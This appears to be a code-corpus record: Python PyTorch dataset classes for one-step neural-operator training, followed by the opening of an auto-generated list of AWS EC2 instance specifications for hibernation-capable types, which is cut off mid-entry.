        t_grid: array-like whose last axis holds the n_times time values.
        x_grid: array-like of spatial grid points; stored as a column vector.
        fcn_data_change: when True, items use the FCN layout instead of the
            FNO layout (see ``_fcn_data_spec`` / ``_fno_data_spec``).
    """

    def __init__(self, X, t_grid, x_grid, fcn_data_change=False):
        super(OneStepDataSetComplex, self).__init__()
        # The number of snapshots per trajectory must match the time grid.
        x_n_t = X.shape[1]
        t_n_t = t_grid.shape[-1]
        assert X.shape[1] == t_grid.shape[-1], "{} != {}".format(x_n_t, t_n_t)
        self.X = torch.tensor(X, dtype=torch.cfloat)
        self.t = torch.tensor(t_grid.flatten(), dtype=torch.float)
        self.x_grid = torch.tensor(x_grid, dtype=torch.float).view(-1, 1)
        # n_times snapshots yield n_times - 1 consecutive (input, target) pairs.
        self.n_tsteps = self.t.shape[0] - 1
        self.n_batches = self.X.shape[0]
        self.dataset_len = self.n_tsteps * self.n_batches
        self.fcn_data_change = fcn_data_change

    def __getitem__(self, idx):
        """Return one (input, target) pair in the configured layout."""
        if self.fcn_data_change:
            return self._fcn_data_spec(idx)
        else:
            return self._fno_data_spec(idx)

    def make_x_train(self, x_in):
        """Append the spatial grid as an extra column to the real view of x_in."""
        x_in = torch.view_as_real(x_in)
        y = torch.cat([x_in, self.x_grid], axis=1)
        return y

    def _split_idx(self, idx):
        """Map a flat dataset index to (trajectory, time-step) coordinates."""
        t_idx = int(idx % self.n_tsteps) + 1
        batch_idx = int(int(idx // self.n_tsteps) % self.n_batches)
        return batch_idx, t_idx

    def _fno_data_spec(self, idx):
        """FNO layout: grid-augmented input at step t-1, raw target at step t."""
        batch_idx, t_idx = self._split_idx(idx)
        x = self.make_x_train(self.X[batch_idx, t_idx - 1])
        y = self.X[batch_idx, t_idx]
        return x, y

    def _fcn_data_spec(self, idx):
        """FCN layout: transposed real views of steps t-1 and t."""
        batch_idx, t_idx = self._split_idx(idx)
        x = torch.view_as_real(self.X[batch_idx, t_idx - 1]).T
        y = torch.view_as_real(self.X[batch_idx, t_idx]).T
        return x, y

    def __len__(self):
        return self.dataset_len

    def __repr__(self):
        if self.fcn_data_change:
            s = 'FCN'
        else:
            s = 'FNO'
        return "OneStepDataSetComplex with length {}, t_grid {}, n_batches {}, data_spec {}".format(self.dataset_len,
                                                                                                    self.t,
                                                                                                    self.n_batches,
                                                                                                    s)
class OneStepDataSetReal(torch.utils.data.Dataset):
    """One-step pairs (u(t-1), u(t)) drawn from real-valued trajectories.

    Fixes over the original: the unused ``idx_original`` locals are removed,
    the dead commented-out ``self.__getitem__`` rebinding is deleted (instance
    attributes never participate in the ``[]`` protocol, which is why that
    approach was abandoned), and the duplicated flat-index arithmetic is
    factored into one helper.

    Args:
        X: array-like of shape (n_trajectories, n_times, n_grid); stored as
            a ``torch.float`` tensor.
        t_grid: array-like whose last axis holds the n_times time values.
        x_grid: array-like of spatial grid points; stored as a column vector.
        fcn_data_change: when True, items use the FCN layout instead of the
            FNO layout (see ``_fcn_data_spec`` / ``_fno_data_spec``).
    """

    def __init__(self, X, t_grid, x_grid, fcn_data_change=False):
        super(OneStepDataSetReal, self).__init__()
        # The number of snapshots per trajectory must match the time grid.
        x_n_t = X.shape[1]
        t_n_t = t_grid.shape[-1]
        assert X.shape[1] == t_grid.shape[-1], "{} != {}".format(x_n_t, t_n_t)
        self.X = torch.tensor(X, dtype=torch.float)
        self.t = torch.tensor(t_grid.flatten(), dtype=torch.float)
        self.x_grid = torch.tensor(x_grid, dtype=torch.float).view(-1, 1)
        # n_times snapshots yield n_times - 1 consecutive (input, target) pairs.
        self.n_tsteps = self.t.shape[0] - 1
        self.n_batches = self.X.shape[0]
        self.dataset_len = self.n_tsteps * self.n_batches
        self.fcn_data_change = fcn_data_change

    def __getitem__(self, idx):
        """Return one (input, target) pair in the configured layout."""
        if self.fcn_data_change:
            return self._fcn_data_spec(idx)
        else:
            return self._fno_data_spec(idx)

    def make_x_train(self, x_in):
        """Append the spatial grid as an extra column to the state column vector."""
        y = torch.cat([x_in.view(-1, 1), self.x_grid], axis=1)
        return y

    def _split_idx(self, idx):
        """Map a flat dataset index to (trajectory, time-step) coordinates."""
        t_idx = int(idx % self.n_tsteps) + 1
        batch_idx = int(int(idx // self.n_tsteps) % self.n_batches)
        return batch_idx, t_idx

    def _fno_data_spec(self, idx):
        """FNO layout: grid-augmented input at step t-1, raw target at step t."""
        batch_idx, t_idx = self._split_idx(idx)
        x = self.make_x_train(self.X[batch_idx, t_idx - 1])
        y = self.X[batch_idx, t_idx]
        return x, y

    def _fcn_data_spec(self, idx):
        """FCN layout: steps t-1 and t reshaped to single-row matrices."""
        batch_idx, t_idx = self._split_idx(idx)
        x = self.X[batch_idx, t_idx - 1].view(1, -1)
        y = self.X[batch_idx, t_idx].view(1, -1)
        return x, y

    def __len__(self):
        return self.dataset_len

    def __repr__(self):
        if self.fcn_data_change:
            s = 'FCN'
        else:
            s = 'FNO'
        return "OneStepDataSetReal with length {}, t_grid {}, n_batches {}, data_spec {}".format(self.dataset_len,
                                                                                                 self.t,
                                                                                                 self.n_batches,
                                                                                                 s)
| 39.832
| 117
| 0.525808
| 671
| 4,979
| 3.552906
| 0.084948
| 0.046141
| 0.065436
| 0.065436
| 0.921141
| 0.921141
| 0.921141
| 0.895973
| 0.895973
| 0.895973
| 0
| 0.010722
| 0.363125
| 4,979
| 124
| 118
| 40.153226
| 0.741091
| 0.068488
| 0
| 0.84
| 0
| 0
| 0.037838
| 0.004541
| 0
| 0
| 0
| 0
| 0.02
| 1
| 0.14
| false
| 0
| 0.01
| 0.02
| 0.31
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5efbaaabf00e8a7c895503d91145ab8dc620124b
| 261,826
|
py
|
Python
|
ec2_compare/internal/hibernation/true.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
ec2_compare/internal/hibernation/true.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
ec2_compare/internal/hibernation/true.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
# Automatically generated
# pylint: disable=all
get = [{'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 1, 'DefaultCores': 1, 'DefaultThreadsPerCore': 1, 'SizeInMiB': 3840, 'TotalSizeInGB': 4, 'Disks': [{'SizeInGB': 4, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'unsupported', 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 6, 'Ipv6AddressesPerInterface': 0, 'Ipv6Supported': False, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 'm3.medium', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'SupportedVirtualizationTypes': ['hvm', 'paravirtual'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 1, 'DefaultCores': 1, 'DefaultThreadsPerCore': 1}, 'MemoryInfo': {'SizeInMiB': 3840}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 4, 'Disks': [{'SizeInGB': 4, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'unsupported'}, 'EbsInfo': {'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 6, 'Ipv6AddressesPerInterface': 0, 'Ipv6Supported': False, 'EnaSupport': 'unsupported', 'EfaSupported': False, 
'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['i386', 'x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 1, 'DefaultCores': 1, 'DefaultThreadsPerCore': 1, 'SizeInMiB': 1024, 'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 2, 'Ipv6AddressesPerInterface': 2, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't2.micro', 'CurrentGeneration': True, 'FreeTierEligible': True, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['i386', 'x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 1, 'DefaultCores': 1, 'DefaultThreadsPerCore': 1}, 'MemoryInfo': {'SizeInMiB': 1024}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 2, 'Ipv6AddressesPerInterface': 2, 'Ipv6Supported': True, 'EnaSupport': 
'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['i386', 'x86_64'], 'SustainedClockSpeedInGhz': 2.4, 'DefaultVCpus': 1, 'DefaultCores': 1, 'DefaultThreadsPerCore': 1, 'SizeInMiB': 512, 'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 2, 'Ipv6AddressesPerInterface': 2, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't2.nano', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['i386', 'x86_64'], 'SustainedClockSpeedInGhz': 2.4}, 'VCpuInfo': {'DefaultVCpus': 1, 'DefaultCores': 1, 'DefaultThreadsPerCore': 1}, 'MemoryInfo': {'SizeInMiB': 512}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 2, 'Ipv6AddressesPerInterface': 2, 
'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['i386', 'x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 1, 'DefaultCores': 1, 'DefaultThreadsPerCore': 1, 'SizeInMiB': 2048, 'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 4, 'Ipv6AddressesPerInterface': 4, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't2.small', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['i386', 'x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 1, 'DefaultCores': 1, 'DefaultThreadsPerCore': 1}, 'MemoryInfo': {'SizeInMiB': 2048}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 4, 
'Ipv6AddressesPerInterface': 4, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['i386', 'x86_64'], 'SustainedClockSpeedInGhz': 2.8, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 3840, 'TotalSizeInGB': 32, 'Disks': [{'SizeInGB': 16, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'unsupported', 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c3.large', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'SupportedVirtualizationTypes': ['hvm', 'paravirtual'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['i386', 'x86_64'], 'SustainedClockSpeedInGhz': 2.8}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 3840}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 32, 'Disks': [{'SizeInGB': 16, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 
'unsupported'}, 'EbsInfo': {'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 3840, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 500, 'BaselineThroughputInMBps': 62.5, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 500, 'MaximumThroughputInMBps': 62.5, 'MaximumIops': 4000}, 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c4.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 
'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 3840}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 500, 'BaselineThroughputInMBps': 62.5, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 500, 'MaximumThroughputInMBps': 62.5, 'MaximumIops': 4000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 4096, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 
'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 4096}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 
2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 4096, 'TotalSizeInGB': 50, 'Disks': [{'SizeInGB': 50, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5d.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 4096}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 50, 'Disks': [{'SizeInGB': 50, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 
'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 15616, 'TotalSizeInGB': 475, 'Disks': [{'SizeInGB': 475, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'supported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 425, 'BaselineThroughputInMBps': 53.125, 'BaselineIops': 3000, 'MaximumBandwidthInMbps': 425, 'MaximumThroughputInMBps': 53.125, 'MaximumIops': 3000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'supported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'i3.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': 
